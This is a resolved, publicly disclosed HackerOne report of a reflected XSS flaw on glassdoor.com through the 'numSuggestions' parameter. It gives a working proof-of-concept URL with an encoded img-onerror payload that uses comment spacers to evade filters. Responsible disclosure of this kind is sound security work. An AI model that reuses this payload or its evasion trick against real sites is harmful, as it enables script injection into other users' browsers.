Reflected XSS at https://www.glassdoor.com/ via the 'numSuggestions' parameter

Disclosed: 2020-12-14 15:27:55 By l0cpd To glassdoor
Medium
Vulnerability Details
Hi there, I have found the xss vulnerability at: https://www.glassdoor.com/ via parameter: `numSuggestions` **Summary:** Affected Parameter: `numSuggestions` **Browsers tested:** Firefox, Chrome, Edge (latest version) ## Steps To Reproduce: Go to: `https://www.glassdoor.com/searchsuggest/typeahead?numSuggestions=8rk3s6%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60` {F1092213} ## Supporting Material/References (screenshots, logs, videos): {F1092214} Regards, @l0cpd ## Impact The attacker can execute JS code.
Actions
View on HackerOne
Report Stats
  • Report ID: 1042486
  • State: Closed
  • Substate: resolved
  • Upvotes: 28
Share this report